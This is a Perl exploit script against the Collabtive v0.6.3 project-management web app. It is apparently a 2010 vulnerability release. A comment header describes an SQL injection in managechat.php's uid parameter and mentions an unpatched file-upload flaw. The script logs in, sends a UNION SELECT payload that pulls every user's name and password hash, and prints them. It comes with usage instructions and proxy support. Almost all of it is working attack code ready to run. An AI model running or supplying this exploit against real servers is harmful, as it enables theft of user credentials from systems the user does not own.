#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;# \#'#/# (-.-)#------------------oOO---(_)---OOo-----------------#|__ __ |#|_____/ /_____ ______/ /_________ ______ |#| / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |#|(__) /_/ /_/ / // /_/ / /_/ / /_/ (__)|#| /____/\__/\__,_/_//_.___/\__,_/\__, /____/ |#| Security Research Division/____/ 2o1o|#--------------------------------------------------#| Collabtive v0.6.3 Multiple Vulnerabilities |#--------------------------------------------------# [!] Discovered by.: DNX# [!] Homepage......: http://starbugs.host.sk# [!] Vendor........: http://collabtive.o-dyn.de# [!] Detected......: 04.06.2010# [!] Reported......: 05.06.2010# [!] Response......: xx.xx.2010## [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.# Das Projekt startete im November 2007. Es ist eine# Open-Source-Software und stellt eine Alternative zu proprietären# Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.## Collabtive wird von einem professionellen Team entwickelt.## [!] Requirements..: Account needed## [!] Bug...........: $_GET['uid'] in managechat.php near line 64## 12: $userto_id = getArrayVal($_GET, "uid");## 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");## The password is encoded with sha1.## [!] Bug...........: The arbitrary file upload discovered by USH is still present.# See http://www.milw0rm.com/exploits/7076 more details.#if(!$ARGV[5]){print"\n \\#'#/ ";print"\n (-.-)";print"\n ---------------oOO---(_)---OOo---------------";print"\n |Collabtive v0.6.3 SQL Injection Exploit|";print"\n | coded by DNX|";print"\n ---------------------------------------------";print"\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";print"\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";print"\n[!] Options:";print"\n -user [text]Username";print"\n -pass [text]Password";print"\n -p [ip:port]Proxy support";print"\n";
exit;}
my %options =();
GetOptions(\%options,"user=s","pass=s","p=s");
my $ua= LWP::UserAgent->new();
my $cookie= HTTP::Cookies->new();
my $host= $ARGV[0];
my $path= $ARGV[1];
my $target="http://".$host.$path;
my $user="";
my $pass="";if($options{"p"}){ $ua->proxy('http',"http://".$options{"p"});}if($options{"user"}){ $user = $options{"user"};}if($options{"pass"}){ $pass= $options{"pass"};}print"[!] Exploiting...\n\n";
exploit();print"\n[!] Done\n";
sub exploit
{############### make login ###############
my $url = $target."manageuser.php?action=login";
my $res = $ua->post($url,[username => $user,pass=> $pass]);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);############################# get users with passwords #############################
$url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
$res = $ua->get($url);
my $content = $res->content;
my @c = split(/<br \/>/, $content);
foreach (@c){if($_ =~/<b>(.*?):<\/b>(.*)/){print $1.":".$2."\n";}}}
